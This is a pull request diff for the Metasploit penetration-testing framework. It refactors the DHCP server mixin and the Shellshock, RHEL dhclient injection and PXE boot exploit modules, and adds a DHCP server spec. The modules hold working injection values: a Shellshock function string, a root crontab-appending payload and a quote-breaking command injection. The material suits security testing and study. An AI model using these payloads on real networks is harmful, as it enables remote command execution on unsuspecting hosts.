### PR TITLE
DHCP mixin: Make DHCP use report_host() and add verbose option

### DIFF
--- a/lib/msf/core/exploit/dhcp_server.rb
+++ b/lib/msf/core/exploit/dhcp_server.rb
@@ -10,6 +10,7 @@ module Msf
 ###
 module Exploit::DHCPServer
   include ::Msf::Exploit::Remote::SocketServer
+  include Msf::Auxiliary::Report
 
   def initialize(info = {})
     super(update_info(info,
@@ -40,6 +41,25 @@ module Exploit::DHCPServer
   def start_service(hash = {}, context = {})
     @dhcp = Rex::Proto::DHCP::Server.new(hash, context)
     vprint_status("Starting DHCP server")
+    @dhcp.report do |event|
+      case event[:type]
+      when :dhcp_discover
+        vprint_status("DHCPDISCOVER from #{event[:mac]}")
+      when :dhcp_request
+        vprint_good("DHCPREQUEST #{event[:mac]} -> #{event[:ip]}")
+        report_host(
+          :host => event[:ip],
+          :mac => event[:mac],
+          :comments => 'Discovered via DHCP'
+        )
+      when :dhcp_pxe
+        print_status("Serving PXE attack to #{event[:mac]} (#{Rex::Socket.addr_ntoa(event[:ip])})")
+        report_note(
+          :type => 'PXE.client',
+          :data => { :client => event[:mac] }
+        )
+      end
+    end
     @dhcp.start
     add_socket(@dhcp.sock)
     @dhcp

--- a/lib/msf/core/exploit/dhcp_server.rb
+++ b/lib/msf/core/exploit/dhcp_server.rb
@@ -39,8 +39,8 @@ module Exploit::DHCPServer
   end
 
   def start_service(hash = {}, context = {})
+    print_status("Starting DHCP server")
     @dhcp = Rex::Proto::DHCP::Server.new(hash, context)
-    vprint_status("Starting DHCP server")
     @dhcp.report do |event|
       case event[:type]
       when :dhcp_discover
@@ -66,7 +66,7 @@ module Exploit::DHCPServer
   end
 
   def stop_service
-    vprint_status("Stopping DHCP server")
+    print_status("Stopping DHCP server")
     @dhcp.stop
   end
 

--- a/lib/msf/core/exploit/dhcp_server.rb
+++ b/lib/msf/core/exploit/dhcp_server.rb
@@ -32,6 +32,8 @@ module Exploit::DHCPServer
         OptString.new('FILENAME',    [ false, "The optional filename of a tftp boot server" ])
       ], self.class)
 
+    deregister_options('SRVPORT', 'SRVSSL') # Isn't (yet?) implemented
+
     @dhcp = nil
   end
 

--- a/lib/rex/proto/dhcp/server.rb
+++ b/lib/rex/proto/dhcp/server.rb
@@ -75,7 +75,11 @@ class Server
     self.served = {}
     self.serveOnce = hash.include?('SERVEONCE')
 
-    self.servePXE = (hash.include?('PXE') or hash.include?('FILENAME') or hash.include?('PXEONLY'))
+    self.servePXE = (
+      (hash.include?('PXE')) or
+      (hash['FILENAME'] && !hash['FILENAME'].to_s.empty?) or
+      (hash['PXEONLY'] == true)
+    )
     self.serveOnlyPXE = hash.include?('PXEONLY')
 
     # Always assume we don't give out hostnames ...

--- a/lib/rex/proto/dhcp/server.rb
+++ b/lib/rex/proto/dhcp/server.rb
@@ -26,7 +26,7 @@ class Server
     self.context = context
     self.sock = nil
 
-    self.myfilename = hash['FILENAME'] || ""
+    self.myfilename = (hash['FILENAME'] || '').dup
     self.myfilename << ("\x00" * (128 - self.myfilename.length))
 
     source = hash['SRVHOST'] || Rex::Socket.source_address

--- a/lib/rex/proto/dhcp/server.rb
+++ b/lib/rex/proto/dhcp/server.rb
@@ -247,6 +247,17 @@ protected
       end
     end
 
+    mac = _clienthwaddr.unpack('C6').map { |b| "%02x" % b }.join(':')
+    ip_packed = self.served[buf[28..43]]&.first
+    ip = ip_packed ? Rex::Socket.addr_itoa(ip_packed) : nil
+
+    case messageType
+    when Constants::DHCPDiscover
+      self.reporter.call(type: :dhcp_discover, mac: mac) if self.reporter
+    when Constants::DHCPRequest
+      self.reporter.call(type: :dhcp_request, mac: mac, ip: ip) if self.reporter
+    end
+
     # don't serve if only serving PXE and not PXE request
     return if pxeclient == false and self.serveOnlyPXE == true
 
@@ -314,9 +325,7 @@ protected
         pkt << dhcpoption(Constants::OpPXEConfigFile, self.pxealtconfigfile)
       else
         # We are handing out an IP and our PXE attack
-        if(self.reporter)
-          self.reporter.call(buf[28..43],self.ipstring)
-        end
+        self.reporter.call(type: :dhcp_pxe, mac: mac, ip: ipstring) if self.reporter
         pkt << dhcpoption(Constants::OpPXEConfigFile, self.pxeconfigfile)
       end
       pkt << dhcpoption(Constants::OpPXEPathPrefix, self.pxepathprefix)

--- a/lib/rex/proto/dhcp/server.rb
+++ b/lib/rex/proto/dhcp/server.rb
@@ -117,8 +117,8 @@ class Server
     )
 
     # Dynamically bind to interface if provided
-    if interface && !interface.empty?
-      self.sock.setsockopt(::Socket::SOL_SOCKET, ::Socket::SO_BINDTODEVICE, "#{interface}\0")
+    if self.interface && !self.interface.empty?
+      self.sock.setsockopt(::Socket::SOL_SOCKET, ::Socket::SO_BINDTODEVICE, "#{self.interface}\0")
     end
 
     self.thread = Rex::ThreadFactory.spawn("DHCPServerMonitor", false) {

--- a/modules/auxiliary/server/dhclient_bash_env.rb
+++ b/modules/auxiliary/server/dhclient_bash_env.rb
@@ -56,25 +56,15 @@ class MetasploitModule < Msf::Auxiliary
   def run
     value = "() { :; }; PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin #{datastore['CMD']}"
 
-    hash = datastore.copy
-    hash['DOMAINNAME'] = value
-    hash['HOSTNAME'] = value
-    hash['URL'] = value
+    start_service(datastore.merge({
+      'DOMAINNAME' => value,
+      'HOSTNAME'   => value,
+      'URL'        => value
+    }))
 
-    # This loop is required because the current DHCP Server exits after the
-    # first interaction.
-    loop do
-      begin
-        start_service(hash)
+    # Wait for finish
+    sleep 2 while @dhcp&.thread&.alive?
 
-        while @dhcp.thread.alive?
-          select(nil, nil, nil, 2)
-        end
-      rescue Interrupt
-        break
-      ensure
-        stop_service
-      end
-    end
+    stop_service
   end
 end

--- a/modules/auxiliary/server/dhclient_bash_env.rb
+++ b/modules/auxiliary/server/dhclient_bash_env.rb
@@ -6,7 +6,7 @@
 class MetasploitModule < Msf::Auxiliary
   include Msf::Exploit::Remote::DHCPServer
 
-  def initialize
+  def initialize(info = {})
     super(
       'Name' => 'DHCP Client Bash Environment Variable Code Injection (Shellshock)',
       'Description' => %q{
@@ -23,7 +23,7 @@ class MetasploitModule < Msf::Auxiliary
       ],
       'License' => MSF_LICENSE,
       'Actions' => [
-        [ 'Service', 'Description' => 'Run malicious DHCP server' ]
+        [ 'Service', 'Description' => 'Run Shellshock DHCP server' ]
       ],
       'PassiveActions' => [
         'Service'
@@ -38,7 +38,7 @@ class MetasploitModule < Msf::Auxiliary
         [ 'URL', 'https://seclists.org/oss-sec/2014/q3/649' ],
         [ 'URL', 'https://www.trustedsec.com/september-2014/shellshock-dhcp-rce-proof-concept/' ]
       ],
-      'DisclosureDate' => 'Sep 24 2014',
+      'DisclosureDate' => '2014-09-24',
       'Notes' => {
         'AKA' => ['Shellshock']
       }
@@ -54,7 +54,7 @@ class MetasploitModule < Msf::Auxiliary
   end
 
   def run
-    value = "() { :; }; PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin #{datastore['CMD']}"
+    value = "() { :;};PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin #{datastore['CMD']}"
 
     start_service(datastore.merge({
       'DOMAINNAME' => value,

--- a/modules/auxiliary/server/dhclient_bash_env.rb
+++ b/modules/auxiliary/server/dhclient_bash_env.rb
@@ -6,7 +6,7 @@
 class MetasploitModule < Msf::Auxiliary
   include Msf::Exploit::Remote::DHCPServer
 
-  def initialize(info = {})
+  def initialize()
     super(
       'Name' => 'DHCP Client Bash Environment Variable Code Injection (Shellshock)',
       'Description' => %q{
@@ -23,7 +23,7 @@ class MetasploitModule < Msf::Auxiliary
       ],
       'License' => MSF_LICENSE,
       'Actions' => [
-        [ 'Service', 'Description' => 'Run Shellshock DHCP server' ]
+        [ 'Service', { 'Description' => 'Run Shellshock DHCP server' } ]
       ],
       'PassiveActions' => [
         'Service'
@@ -58,8 +58,8 @@ class MetasploitModule < Msf::Auxiliary
 
     start_service(datastore.merge({
       'DOMAINNAME' => value,
-      'HOSTNAME'   => value,
-      'URL'        => value
+      'HOSTNAME' => value,
+      'URL' => value
     }))
 
     # Wait for finish

--- a/modules/auxiliary/server/dhclient_bash_env.rb
+++ b/modules/auxiliary/server/dhclient_bash_env.rb
@@ -6,7 +6,7 @@
 class MetasploitModule < Msf::Auxiliary
   include Msf::Exploit::Remote::DHCPServer
 
-  def initialize()
+  def initialize
     super(
       'Name' => 'DHCP Client Bash Environment Variable Code Injection (Shellshock)',
       'Description' => %q{
@@ -50,17 +50,53 @@ class MetasploitModule < Msf::Auxiliary
       ]
     )
 
+    register_advanced_options(
+      [
+        OptString.new(
+          'SHELLSHOCK_DHCP_VARS',
+          [
+            true,
+            'DHCP variables to poison (comma-separated: domainname, hostname, url)',
+            'domainname,hostname,url'
+          ]
+        )
+      ]
+    )
+
     deregister_options('DOMAINNAME', 'HOSTNAME', 'URL')
+  end
+
+  def dhcp_vars
+    vars = datastore['SHELLSHOCK_DHCP_VARS'].to_s.split(',').map(&:strip)
+    invalid = vars - %w[domainname hostname url]
+    fail_with(Failure::BadConfig, "Invalid SHELLSHOCK_DHCP_VARS: #{invalid.join(', ')}") unless invalid.empty?
+    vars
+  end
+
+  def build_dhcp_vars(value)
+    vars = {}
+
+    dhcp_vars.each do |var|
+      vprint_status("Injecting into: DHCP #{var}")
+      case var
+      when 'domainname'
+        vars['DOMAINNAME'] = value
+      when 'hostname'
+        vars['HOSTNAME'] = value
+      when 'url'
+        vars['URL'] = value
+      end
+    end
+
+    vars
   end
 
   def run
     value = "() { :;};PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin #{datastore['CMD']}"
 
-    start_service(datastore.merge({
-      'DOMAINNAME' => value,
-      'HOSTNAME' => value,
-      'URL' => value
-    }))
+    start_service(
+      datastore.merge(build_dhcp_vars(value))
+    )
 
     # Wait for finish
     sleep 2 while @dhcp&.thread&.alive?

--- a/modules/auxiliary/server/dhcp.rb
+++ b/modules/auxiliary/server/dhcp.rb
@@ -15,7 +15,7 @@ class MetasploitModule < Msf::Auxiliary
       'Author' => [ 'scriptjunkie', 'apconole[at]yahoo.com' ],
       'License' => MSF_LICENSE,
       'Actions' => [
-        [ 'Service', 'Description' => 'Run DHCP server' ]
+        [ 'Service', { 'Description' => 'Run DHCP server' } ]
       ],
       'PassiveActions' => [
         'Service'

--- a/modules/auxiliary/server/dhcp.rb
+++ b/modules/auxiliary/server/dhcp.rb
@@ -5,7 +5,6 @@
 
 class MetasploitModule < Msf::Auxiliary
   include Msf::Exploit::Remote::DHCPServer
-  include Msf::Auxiliary::Report
 
   def initialize
     super(
@@ -13,7 +12,7 @@ class MetasploitModule < Msf::Auxiliary
       'Description' => %q{
         This module provides a DHCP service
       },
-      'Author' => [ 'scriptjunkie', 'apconole@yahoo.com' ],
+      'Author' => [ 'scriptjunkie', 'apconole[at]yahoo.com' ],
       'License' => MSF_LICENSE,
       'Actions' => [
         [ 'Service', 'Description' => 'Run DHCP server' ]

--- a/modules/auxiliary/server/dhcp.rb
+++ b/modules/auxiliary/server/dhcp.rb
@@ -26,18 +26,11 @@ class MetasploitModule < Msf::Auxiliary
   end
 
   def run
-    @dhcp = Rex::Proto::DHCP::Server.new(datastore)
+    start_service(datastore)
 
-    print_status("Starting DHCP server...")
-    @dhcp.start
-    add_socket(@dhcp.sock)
+    # Wait for finish
+    sleep 2 while @dhcp&.thread&.alive?
 
-    # Wait for finish..
-    while @dhcp.thread.alive?
-      select(nil, nil, nil, 2)
-    end
-
-    print_status("Stopping DHCP server...")
-    @dhcp.stop
+    stop_service
   end
 end

--- a/modules/auxiliary/server/pxeexploit.rb
+++ b/modules/auxiliary/server/pxeexploit.rb
@@ -63,8 +63,11 @@ class MetasploitModule < Msf::Auxiliary
     # Starting DHCP server
     start_service
 
-    # Wait for finish..
+    print_status("PXE boot attack started")
+
+    # Wait for finish
     @tftp.thread.join
     @dhcp.thread.join
+    print_status("PXE boot attack completed")
   end
 end

--- a/modules/auxiliary/server/pxeexploit.rb
+++ b/modules/auxiliary/server/pxeexploit.rb
@@ -27,7 +27,7 @@ class MetasploitModule < Msf::Auxiliary
       'Author' => [ 'scriptjunkie' ],
       'License' => MSF_LICENSE,
       'Actions' => [
-        [ 'Service', 'Description' => 'Run PXE server' ]
+        [ 'Service', { 'Description' => 'Run PXE server' } ]
       ],
       'PassiveActions' => [
         'Service'
@@ -54,20 +54,20 @@ class MetasploitModule < Msf::Auxiliary
   end
 
   def run
-    print_status("Starting TFTP server...")
+    print_status('Starting TFTP server...')
     @tftp = Rex::Proto::TFTP::Server.new
     @tftp.set_tftproot(datastore['TFTPROOT'])
     @tftp.start
     add_socket(@tftp.sock)
 
     # Starting DHCP server
-    start_service
+    start_service(datastore)
 
-    print_status("PXE boot attack started")
+    print_status('PXE boot attack started')
 
     # Wait for finish
     @tftp.thread.join
     @dhcp.thread.join
-    print_status("PXE boot attack completed")
+    print_status('PXE boot attack completed')
   end
 end

--- a/modules/auxiliary/server/pxeexploit.rb
+++ b/modules/auxiliary/server/pxeexploit.rb
@@ -4,8 +4,9 @@
 ##
 
 class MetasploitModule < Msf::Auxiliary
-  include Msf::Exploit::Remote::TFTPServer
   include Msf::Auxiliary::Report
+  include Msf::Exploit::Remote::TFTPServer
+  include Msf::Exploit::Remote::DHCPServer
 
   def initialize
     super(
@@ -59,18 +60,8 @@ class MetasploitModule < Msf::Auxiliary
     @tftp.start
     add_socket(@tftp.sock)
 
-    print_status("Starting DHCP server...")
-    @dhcp = Rex::Proto::DHCP::Server.new(datastore)
-    @dhcp.report do |mac, ip|
-      print_status("Serving PXE attack to #{mac.unpack('H2H2H2H2H2H2').join(':')} " +
-          "(#{Rex::Socket.addr_ntoa(ip)})")
-      report_note(
-        :type => 'PXE.client',
-        :data => { :client => mac.unpack('H2H2H2H2H2H2').join(':') }
-      )
-    end
-    @dhcp.start
-    add_socket(@dhcp.sock)
+    # Starting DHCP server
+    start_service
 
     # Wait for finish..
     @tftp.thread.join

--- a/modules/exploits/unix/dhcp/bash_environment.rb
+++ b/modules/exploits/unix/dhcp/bash_environment.rb
@@ -88,8 +88,8 @@ class MetasploitModule < Msf::Exploit::Remote
 
     start_service(datastore.merge({
       'DOMAINNAME' => value,
-      'HOSTNAME'   => value,
-      'URL'        => value
+      'HOSTNAME' => value,
+      'URL' => value
     }))
 
     # Wait for finish

--- a/modules/exploits/unix/dhcp/bash_environment.rb
+++ b/modules/exploits/unix/dhcp/bash_environment.rb
@@ -65,7 +65,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def on_new_session(session)
-    print_status 'Cleaning up crontab'
+    print_status('Cleaning up crontab')
     # XXX this will brick a server some day
     session.shell_command_token("sed -i '/^\\* \\* \\* \\* \\* root/d' /etc/crontab")
   end
@@ -78,6 +78,9 @@ class MetasploitModule < Msf::Exploit::Remote
     if hash['DOMAINNAME'].length > 255
       raise ArgumentError, 'payload too long'
     end
+
+    vprint_status('Launching exploit. This may take up to 60 seconds.')
+    print_warning('This module adds a job to /etc/crontab which may require manual removal!')
 
     start_service(datastore.merge({
       'DOMAINNAME' => value,

--- a/modules/exploits/unix/dhcp/bash_environment.rb
+++ b/modules/exploits/unix/dhcp/bash_environment.rb
@@ -62,13 +62,50 @@ class MetasploitModule < Msf::Exploit::Remote
       )
     )
 
-    deregister_options('DOMAINNAME', 'HOSTNAME', 'URL')
+    register_advanced_options(
+      [
+        OptString.new(
+          'SHELLSHOCK_DHCP_VARS',
+          [
+            true,
+            'DHCP variables to poison (comma-separated: domainname, hostname, url)',
+            'domainname,hostname,url'
+          ]
+        )
+      ]
+    )
 
+    deregister_options('DOMAINNAME', 'HOSTNAME', 'URL')
     self.needs_cleanup = true
   end
 
+  def dhcp_vars
+    vars = datastore['SHELLSHOCK_DHCP_VARS'].to_s.split(',').map(&:strip)
+    invalid = vars - %w[domainname hostname url]
+    fail_with(Failure::BadConfig, "Invalid SHELLSHOCK_DHCP_VARS: #{invalid.join(', ')}") unless invalid.empty?
+    vars
+  end
+
+  def build_dhcp_vars(value)
+    vars = {}
+
+    dhcp_vars.each do |var|
+      vprint_status("Injecting into: DHCP #{var}")
+      case var
+      when 'domainname'
+        vars['DOMAINNAME'] = value
+      when 'hostname'
+        vars['HOSTNAME'] = value
+      when 'url'
+        vars['URL'] = value
+      end
+    end
+
+    vars
+  end
+
   def on_new_session(session)
-    print_status('Cleaning up crontab')
+    print_status('Cleaning up /etc/crontab')
     # XXX this will brick a server some day
     session.shell_command_token("sed -i '/^\\* \\* \\* \\* \\* root/d' /etc/crontab")
   end
@@ -86,11 +123,9 @@ class MetasploitModule < Msf::Exploit::Remote
     vprint_status('Launching exploit. This may take up to 60 seconds.')
     print_warning('This module adds a job to /etc/crontab which may require manual removal!')
 
-    start_service(datastore.merge({
-      'DOMAINNAME' => value,
-      'HOSTNAME' => value,
-      'URL' => value
-    }))
+    start_service(
+      datastore.merge(build_dhcp_vars(value))
+    )
 
     # Wait for finish
     sleep 2 while @dhcp&.thread&.alive?

--- a/modules/exploits/unix/dhcp/bash_environment.rb
+++ b/modules/exploits/unix/dhcp/bash_environment.rb
@@ -71,20 +71,23 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def exploit
-    hash = datastore.copy
     # Quotes seem to be completely stripped, so other characters have to be
     # escaped
     p = payload.encoded.gsub(/([<>()|'&;$])/) { |s| Rex::Text.to_hex(s) }
     echo = "echo -e #{(Rex::Text.to_hex('*') + ' ') * 5}root #{p}>>/etc/crontab"
-    hash['DOMAINNAME'] = "() { :; };#{echo}"
     if hash['DOMAINNAME'].length > 255
       raise ArgumentError, 'payload too long'
     end
 
-    hash['HOSTNAME'] = "() { :; };#{echo}"
-    hash['URL'] = "() { :; };#{echo}"
-    start_service(hash)
+    start_service(datastore.merge({
+      'DOMAINNAME' => value,
+      'HOSTNAME'   => value,
+      'URL'        => value
+    }))
 
-    sleep 2 while @dhcp.thread.alive?
+    # Wait for finish
+    sleep 2 while @dhcp&.thread&.alive?
+
+    stop_service
   end
 end

--- a/modules/exploits/unix/dhcp/bash_environment.rb
+++ b/modules/exploits/unix/dhcp/bash_environment.rb
@@ -50,6 +50,9 @@ class MetasploitModule < Msf::Exploit::Remote
         'Targets' => [ [ 'Automatic Target', {}] ],
         'DefaultTarget' => 0,
         'DisclosureDate' => '2014-09-24',
+        'DefaultOptions' => {
+          'WfsDelay' => 60
+        },
         'Notes' => {
           'Stability' => [CRASH_SAFE],
           'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK],
@@ -74,8 +77,9 @@ class MetasploitModule < Msf::Exploit::Remote
     # Quotes seem to be completely stripped, so other characters have to be
     # escaped
     p = payload.encoded.gsub(/([<>()|'&;$])/) { |s| Rex::Text.to_hex(s) }
-    echo = "echo -e #{(Rex::Text.to_hex('*') + ' ') * 5}root #{p}>>/etc/crontab"
-    if hash['DOMAINNAME'].length > 255
+    value = "() { :;};echo -e #{(Rex::Text.to_hex('*') + ' ') * 5}root #{p}>>/etc/crontab"
+
+    if value.length > 255
       raise ArgumentError, 'payload too long'
     end
 

--- a/modules/exploits/unix/dhcp/rhel_dhcp_client_command_injection.rb
+++ b/modules/exploits/unix/dhcp/rhel_dhcp_client_command_injection.rb
@@ -57,11 +57,16 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def exploit
-    hash = datastore.copy
-    start_service(hash)
-    @dhcp.set_option(proxy_auto_discovery: "#{Rex::Text.rand_text_alpha(6..12)}'&#{payload.encoded} #")
+    value = "#{Rex::Text.rand_text_alpha(6..12)}'&#{payload.encoded} #"
 
-    sleep 2 while @dhcp.thread.alive?
+    start_service(datastore.merge({
+      'proxy_auto_discovery' => value,
+    }))
+
+    # Wait for finish
+    sleep 2 while @dhcp&.thread&.alive?
+
+    stop_service
   end
 
   def cleanup

--- a/modules/exploits/unix/dhcp/rhel_dhcp_client_command_injection.rb
+++ b/modules/exploits/unix/dhcp/rhel_dhcp_client_command_injection.rb
@@ -59,9 +59,8 @@ class MetasploitModule < Msf::Exploit::Remote
   def exploit
     value = "#{Rex::Text.rand_text_alpha(6..12)}'&#{payload.encoded} #"
 
-    start_service(datastore.merge({
-      'proxy_auto_discovery' => value,
-    }))
+    start_service(datastore)
+    @dhcp.set_option(proxy_auto_discovery: value)
 
     # Wait for finish
     sleep 2 while @dhcp&.thread&.alive?

--- a/modules/exploits/windows/local/pxeexploit.rb
+++ b/modules/exploits/windows/local/pxeexploit.rb
@@ -7,6 +7,7 @@ class MetasploitModule < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
   include Msf::Exploit::Remote::TFTPServer
+  include Msf::Exploit::Remote::DHCPServer
   include Msf::Auxiliary::Report
 
   def initialize
@@ -148,18 +149,9 @@ class MetasploitModule < Msf::Exploit::Remote
     @tftp.register_file('update4', initrd)
     @tftp.start
 
-    print_status("Starting DHCP server...")
-    @dhcp = Rex::Proto::DHCP::Server.new(datastore)
-    @dhcp.report do |mac, ip|
-      print_status("Serving PXE attack to #{mac.unpack('H2H2H2H2H2H2').join(':')} " +
-          "(#{Rex::Socket.addr_ntoa(ip)})")
-      report_note({
-        :type => 'PXE.client',
-        :data => { :client => mac.unpack('H2H2H2H2H2H2').join(':') }
-      })
-    end
-    @dhcp.start
     print_status("pxesploit attack started")
+    # Starting DHCP server
+    start_service
 
     # Wait for finish..
     @tftp.thread.join

--- a/modules/exploits/windows/local/pxeexploit.rb
+++ b/modules/exploits/windows/local/pxeexploit.rb
@@ -31,7 +31,7 @@ class MetasploitModule < Msf::Exploit::Remote
       },
       'Payload' => {
         'Space' => 4500,
-        'DisableNops' => true,
+        'DisableNops' => true
       },
       'Platform' => 'win',
       'DisclosureDate' => 'Aug 05 2011',
@@ -83,7 +83,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def exploit
     # Prepare payload
-    print_status("Creating initrd")
+    print_status('Creating initrd')
     initrd = File.binread(File.join(Msf::Config.data_directory, 'exploits', 'pxexploit', 'updatecustom'))
     uncompressed = Rex::Text.ungzip(initrd)
     payl = payload.generate
@@ -93,17 +93,15 @@ class MetasploitModule < Msf::Exploit::Remote
     # Meterpreter attack
     if framework.sessions.include? datastore['SESSION']
       client = framework.sessions[datastore['SESSION']]
-      if not client.lanattacks
-        print_status("Loading lanattacks extension...")
-        client.core.use("lanattacks")
-      else
-        if datastore['RESETPXE']
-          print_status("Resetting PXE attack...")
-          client.lanattacks.dhcp.reset
-        end
+      if !client.lanattacks
+        print_status('Loading lanattacks extension...')
+        client.core.use('lanattacks')
+      elsif datastore['RESETPXE']
+        print_status('Resetting PXE attack...')
+        client.lanattacks.dhcp.reset
       end
 
-      print_status("Loading DHCP options...")
+      print_status('Loading DHCP options...')
       client.lanattacks.dhcp.load_options(datastore)
       0.upto(4) do |i|
         print_status("Loading file #{i + 1} of 5")
@@ -114,49 +112,48 @@ class MetasploitModule < Msf::Exploit::Remote
         end
         client.lanattacks.tftp.add_file("update#{i}", contents)
       end
-      print_status("Starting TFTP server...")
+      print_status('Starting TFTP server...')
       client.lanattacks.tftp.start
-      print_status("Starting DHCP server...")
+      print_status('Starting DHCP server...')
       client.lanattacks.dhcp.start
-      print_status("PXE boot attack started")
-      while (true) do
+      print_status('PXE boot attack started')
+      while (true)
         begin
           # get stats every 20s
           select(nil, nil, nil, 20)
           client.lanattacks.dhcp.log.each do |item|
-            print_status("Served PXE attack to #{item[0].unpack('H2H2H2H2H2H2').join(':')} " +
-                "(#{Rex::Socket.addr_ntoa(item[1])})")
+            print_status("Served PXE attack to #{item[0].unpack('H2H2H2H2H2H2').join(':')} (#{Rex::Socket.addr_ntoa(item[1])})")
             report_note({
-              :type => 'PXE.client',
-              :data => { :client => item[0].unpack('H2H2H2H2H2H2').join(':') }
+              type: 'PXE.client',
+              data: { client: item[0].unpack('H2H2H2H2H2H2').join(':') }
             })
           end
         rescue ::Interrupt
-          print_status("Stopping TFTP server...")
+          print_status('Stopping TFTP server...')
           client.lanattacks.tftp.stop
-          print_status("Stopping DHCP server...")
+          print_status('Stopping DHCP server...')
           client.lanattacks.dhcp.stop
-          print_status("PXE boot attack stopped")
+          print_status('PXE boot attack stopped')
           return
         end
       end
     end
 
     # normal attack
-    print_status("Starting TFTP server...")
+    print_status('Starting TFTP server...')
     @tftp = Rex::Proto::TFTP::Server.new
     @tftp.set_tftproot(datastore['TFTPROOT'])
     @tftp.register_file('update4', initrd)
     @tftp.start
 
     # Starting DHCP server
-    start_service
+    start_service(datastore)
 
-    print_status("PXE boot attack started")
+    print_status('PXE boot attack started')
 
     # Wait for finish
     @tftp.thread.join
     @dhcp.thread.join
-    print_status("PXE boot attack completed")
+    print_status('PXE boot attack completed')
   end
 end

--- a/modules/exploits/windows/local/pxeexploit.rb
+++ b/modules/exploits/windows/local/pxeexploit.rb
@@ -118,7 +118,7 @@ class MetasploitModule < Msf::Exploit::Remote
       client.lanattacks.tftp.start
       print_status("Starting DHCP server...")
       client.lanattacks.dhcp.start
-      print_status("pxesploit attack started")
+      print_status("PXE boot attack started")
       while (true) do
         begin
           # get stats every 20s
@@ -136,7 +136,7 @@ class MetasploitModule < Msf::Exploit::Remote
           client.lanattacks.tftp.stop
           print_status("Stopping DHCP server...")
           client.lanattacks.dhcp.stop
-          print_status("PXEsploit attack stopped")
+          print_status("PXE boot attack stopped")
           return
         end
       end
@@ -149,13 +149,14 @@ class MetasploitModule < Msf::Exploit::Remote
     @tftp.register_file('update4', initrd)
     @tftp.start
 
-    print_status("pxesploit attack started")
     # Starting DHCP server
     start_service
 
-    # Wait for finish..
+    print_status("PXE boot attack started")
+
+    # Wait for finish
     @tftp.thread.join
     @dhcp.thread.join
-    print_status("pxesploit attack completed")
+    print_status("PXE boot attack completed")
   end
 end

--- a/spec/lib/rex/proto/dhcp/server_spec.rb
+++ b/spec/lib/rex/proto/dhcp/server_spec.rb
@@ -1,0 +1,174 @@
+# -*- coding: binary -*-
+
+require 'spec_helper'
+
+RSpec.describe Rex::Proto::DHCP::Server do
+  let(:base_hash) do
+    { 'SRVHOST' => '192.168.1.1', 'NETMASK' => '255.255.255.0' }
+  end
+
+  subject(:server) { described_class.new(base_hash) }
+
+  def dhcp_packet(message_type, mac: "\xaa\xbb\xcc\xdd\xee\xff")
+    buf = +''
+    buf << [Rex::Proto::DHCP::Constants::Request].pack('C')
+    buf << "\x01"
+    buf << [6].pack('C')
+    buf << "\x00"
+    buf << "\x12\x34\x56\x78"
+    buf << "\x00\x00"
+    buf << "\x00\x00"
+    buf << "\x00\x00\x00\x00"
+    buf << "\x00\x00\x00\x00"
+    buf << "\x00\x00\x00\x00"
+    buf << "\x00\x00\x00\x00"
+    buf << mac
+    buf << ("\x00" * 10)
+    buf << ("\x00" * 64)
+    buf << ("\x00" * 128)
+    buf << Rex::Proto::DHCP::Constants::DHCPMagic
+    buf << "\x35\x01" << [message_type].pack('C')
+    buf << "\xff"
+    buf
+  end
+
+  describe '#initialize' do
+    describe 'servePXE' do
+      it 'is false when FILENAME key is absent' do
+        expect(server.servePXE).to be false
+      end
+
+      it 'is false when FILENAME is an empty string' do
+        srv = described_class.new(base_hash.merge('FILENAME' => ''))
+        expect(srv.servePXE).to be false
+      end
+
+      it 'is true when FILENAME is a non-empty string' do
+        srv = described_class.new(base_hash.merge('FILENAME' => 'pxelinux.0'))
+        expect(srv.servePXE).to be true
+      end
+
+      it 'is true when the PXE key is present' do
+        srv = described_class.new(base_hash.merge('PXE' => true))
+        expect(srv.servePXE).to be true
+      end
+
+      it 'is false when PXEONLY is false' do
+        srv = described_class.new(base_hash.merge('PXEONLY' => false))
+        expect(srv.servePXE).to be false
+      end
+
+      it 'is true when PXEONLY is true' do
+        srv = described_class.new(base_hash.merge('PXEONLY' => true))
+        expect(srv.servePXE).to be true
+      end
+    end
+  end
+
+  describe 'reporter callbacks via #report' do
+    let(:sock) { instance_double(Rex::Socket::Udp, sendto: 1) }
+    let(:events) { [] }
+    let(:from) { ['0.0.0.0', 68] }
+    let(:formatted_mac) { 'aa:bb:cc:dd:ee:ff' }
+
+    let(:server_with_reporter) do
+      srv = described_class.new(base_hash)
+      srv.sock = sock
+      srv.report { |event| events << event }
+      srv
+    end
+
+    context 'on DHCPDISCOVER' do
+      it 'fires :dhcp_discover with a formatted MAC string' do
+        pkt = dhcp_packet(Rex::Proto::DHCP::Constants::DHCPDiscover)
+        server_with_reporter.send(:dispatch_request, from, pkt)
+        expect(events).to include(hash_including(type: :dhcp_discover, mac: formatted_mac))
+      end
+
+      it 'does not include an :ip key in the discover event' do
+        pkt = dhcp_packet(Rex::Proto::DHCP::Constants::DHCPDiscover)
+        server_with_reporter.send(:dispatch_request, from, pkt)
+        discover = events.find { |e| e[:type] == :dhcp_discover }
+        expect(discover).not_to have_key(:ip)
+      end
+    end
+
+    context 'on DHCPREQUEST' do
+      it 'fires :dhcp_request with a formatted MAC string' do
+        pkt = dhcp_packet(Rex::Proto::DHCP::Constants::DHCPRequest)
+        server_with_reporter.send(:dispatch_request, from, pkt)
+        expect(events).to include(hash_including(type: :dhcp_request, mac: formatted_mac))
+      end
+
+      it 'includes an :ip key in the request event' do
+        pkt = dhcp_packet(Rex::Proto::DHCP::Constants::DHCPRequest)
+        server_with_reporter.send(:dispatch_request, from, pkt)
+        request_event = events.find { |e| e[:type] == :dhcp_request }
+        expect(request_event).to have_key(:ip)
+      end
+
+      it 'includes a dotted-decimal IP string after prior DISCOVER assigns one' do
+        mac = "\xde\xad\xbe\xef\xca\xfe"
+        discover = dhcp_packet(Rex::Proto::DHCP::Constants::DHCPDiscover, mac: mac)
+        request = dhcp_packet(Rex::Proto::DHCP::Constants::DHCPRequest, mac: mac)
